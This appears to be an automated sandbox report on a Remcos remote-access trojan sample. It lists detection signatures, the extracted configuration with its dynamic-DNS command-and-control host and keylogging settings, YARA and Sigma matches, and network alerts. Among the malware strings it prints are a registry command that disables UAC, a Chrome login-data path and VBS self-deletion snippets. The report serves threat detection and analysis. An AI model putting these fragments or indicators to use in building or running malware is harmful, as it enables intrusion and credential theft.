
Windows Analysis Report
xi0TpAxHGMsm.exe

Overview

General Information

Sample name: xi0TpAxHGMsm.exe
Analysis ID: 1435635
MD5: effe954da69f8377295e43c84e48bd77
SHA1: 2cce76b35acab30714dcb56042808efbf05ae969
SHA256: 950b538fcf4aa8021867bce803c551b098b1481fc9b468772efb81f51c4c1c8c
Tags: exe, Remcos

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Deletes itself after installation
Installs a global keyboard hook
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • xi0TpAxHGMsm.exe (PID: 524 cmdline: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe" MD5: EFFE954DA69F8377295E43C84E48BD77)
    • wscript.exe (PID: 7224 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "4.9.3 Pro", "Host:Port:Password": "sendfiletiahforem.duckdns.org:8889:0", "Assigned name": "THIAGO-FULL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4QQORA", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "Disk.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
xi0TpAxHGMsm.exe | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
xi0TpAxHGMsm.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
xi0TpAxHGMsm.exe | Windows_Trojan_Remcos_b296e965 | unknown | unknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
xi0TpAxHGMsm.exe | REMCOS_RAT_variants | unknown | unknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
xi0TpAxHGMsm.exe | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:
Source | Rule | Description | Author | Strings
C:\ProgramData\Disk\Disk.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author | Strings
00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
            • 0x134a8:$a1: Remcos restarted by watchdog!
            • 0x13a20:$a3: %02i:%02i:%02i:%03i
00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Source | Rule | Description | Author | Strings
0.0.xi0TpAxHGMsm.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0.0.xi0TpAxHGMsm.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.0.xi0TpAxHGMsm.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
                    • 0x6aaa8:$a1: Remcos restarted by watchdog!
                    • 0x6b020:$a3: %02i:%02i:%02i:%03i
0.0.xi0TpAxHGMsm.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
                    • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b6c:$str_b2: Executing file:
                    • 0x65bec:$str_b3: GetDirectListeningPort
                    • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65718:$str_b7: \update.vbs
                    • 0x64b94:$str_b9: Downloaded file:
                    • 0x64b80:$str_b10: Downloading file:
                    • 0x64c24:$str_b12: Failed to upload file:
                    • 0x65bb4:$str_b13: StartForward
                    • 0x65bd4:$str_b14: StopForward
                    • 0x65670:$str_b15: fso.DeleteFile "
                    • 0x65604:$str_b16: On Error Resume Next
                    • 0x656a0:$str_b17: fso.DeleteFolder "
                    • 0x64c14:$str_b18: Uploaded file:
                    • 0x64bd4:$str_b19: Unable to delete:
                    • 0x65638:$str_b20: while fso.FileExists("
                    • 0x650b1:$str_c0: [Firefox StoredLogins not found]
0.0.xi0TpAxHGMsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
                    • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x6497c:$s1: CoGetObject
                    • 0x64990:$s1: CoGetObject
                    • 0x649ac:$s1: CoGetObject
                    • 0x6e938:$s1: CoGetObject
                    • 0x6493c:$s2: Elevation:Administrator!new:

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: BE D0 3E CA 0B 97 E1 38 5C B0 59 16 BB 2E ED A1 CF DA 98 35 50 51 7D 3C CD A1 1A AD 2D 8C 66 1D 07 F0 50 B4 20 B9 9D 12 33 07 B3 AF 63 FC 55 87 43 36 12 17 55 5C C3 1D 52 43 97 13 05 9D 54 B6 02 9E E9 E7 2B EF 96 17 FA 25 90 6E 91 81 1E 4E 53 F4 CA 8B B3 AB DA 12 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ProcessId: 524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4QQORA\exepath
                    Timestamp:05/03/24-00:35:56.320861
                    SID:2032777
                    Source Port:8889
                    Destination Port:49700
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/03/24-00:35:56.084786
                    SID:2032776
                    Source Port:49700
                    Destination Port:8889
                    Protocol:TCP
                    Classtype:A Network Trojan was detected


                    AV Detection

                    barindex
                    Source: xi0TpAxHGMsm.exeAvira: detected
                    Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                    Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.3 Pro", "Host:Port:Password": "sendfiletiahforem.duckdns.org:8889:0", "Assigned name": "THIAGO-FULL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4QQORA", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "Disk.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\Disk\Disk.dat, type: DROPPED
                    Source: xi0TpAxHGMsm.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00433837
                    Source: xi0TpAxHGMsm.exe, 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e5d48ee3-3

                    Exploits

                    barindex
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004074FD _wcslen,CoGetObject,0_2_004074FD
                    Source: xi0TpAxHGMsm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49700 -> 85.60.29.68:8889
                    Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 85.60.29.68:8889 -> 192.168.2.7:49700
                    Source: Malware configuration extractorURLs: sendfiletiahforem.duckdns.org
                    Source: unknownDNS query: name: sendfiletiahforem.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.7:49700 -> 85.60.29.68:8889
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: UNI2-ASES UNI2-ASES
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B380
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: sendfiletiahforem.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: xi0TpAxHGMsm.exe, xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1302609981.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.0000000000702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
                    Source: xi0TpAxHGMsm.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
